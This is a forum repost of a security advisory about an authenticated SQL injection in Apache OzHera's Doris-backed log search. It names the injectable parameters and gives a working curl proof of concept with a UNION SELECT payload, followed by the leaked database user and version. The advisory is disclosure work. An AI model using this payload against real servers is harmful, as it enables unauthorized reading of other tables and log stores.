Стани премиум член и добиј попуст на 2000+ производи и куп други бенефити!

Apache OzHera 2.2.6 Authenticated SQL Injection

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
1.113
667
www.zeroscience.mk
Код:
Apache OzHera 2.2.6 Authenticated SQL Injection


Vendor: The Apache Software Foundation
Product web page: https://ozhera.apache.org
Affected version: 2.2.6-incubating

Summary: Apache OzHera(Incubating) is an Application Performance
Monitoring (APM) platform designed for the cloud-native era. It
revolves around applications and integrates capabilities such as
metric monitoring, distributed tracing, logging, and alerting. The
platform's mission is to enhance the online stability of applications
and enable businesses to detect and locate issues within 1 minute
and 5 minutes, respectively, when problems occur.

Desc: Apache OzHera is affected by a SQL injection vulnerability
in its Doris-backed log search. In EsDataServiceImpl, the log-search
query is built by string-interpolating user-supplied request parameters
and executed on a plain Statement (createStatement().executeQuery)
with no parameterization or escaping, against the Doris log store.
The injectable parameters are the full-text search term (fullTextSearch,
spliced as a WHERE condition in buildQuerySql and in the statistics
path buildQuerySqlConditional), the sort key (sortKey, spliced after
ORDER BY), and the tail selector (tail, quoted and spliced into a tail
IN (...) clause). Numeric parameters (startTime/endTime/page/pageSize)
are not injectable, and Elasticsearch-backed log stores use a different,
unaffected code path. An authenticated console user can inject SQL and
read data beyond the intended query, including other tables and log
stores within the same Doris instance.

Tested on: Eclipse Temurin OpenJDK 21.0.6 (LTS)
           H2 in-memory
           MySQL mode
           Apache Doris


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2026-6012
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-6012


13.08.2026

--


$ curl -s 'http://TARGET:8080/api/log/query?storeId=251\
> &startTime=0\
> &endTime=9999999999999\
> &fullTextSearch=1%3D0%20UNION%20SELECT%20NULL%2CNULL%2CCONCAT(%27ZSLSQLI%3A%27%2CCURRENT_USER()%2C%27%7C%27%2CVERSION())%2CNULL%2CNULL%2CNULL%20--%20-' \
> -H 'Cookie: SESSION=8f3a1c9e-4b27-4d6a-9f1e-2a7c5b0d6e11; token=eyJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJhZG1pbiJ9.sig'\
> # 1=0 UNION SELECT NULL,NULL,CONCAT('ZSLSQLI:',CURRENT_USER(),'|',VERSION()),NULL,NULL,NULL -- -

{
  "code": 0,
  "message": "success",
  "data": {
    "total": 1,
    "list": [
      {
        "timestamp": null,
        "message": "ZSLSQLI:root@%|5.7.99",
        "tag": null
      }
    ]
  }
}



 
— членови онлајн
—мислења
—теми
—членови

Офтопик

Последни огласи

IT.mk/market понуда

Бесплатна достава на 3000 производи
На врв Дно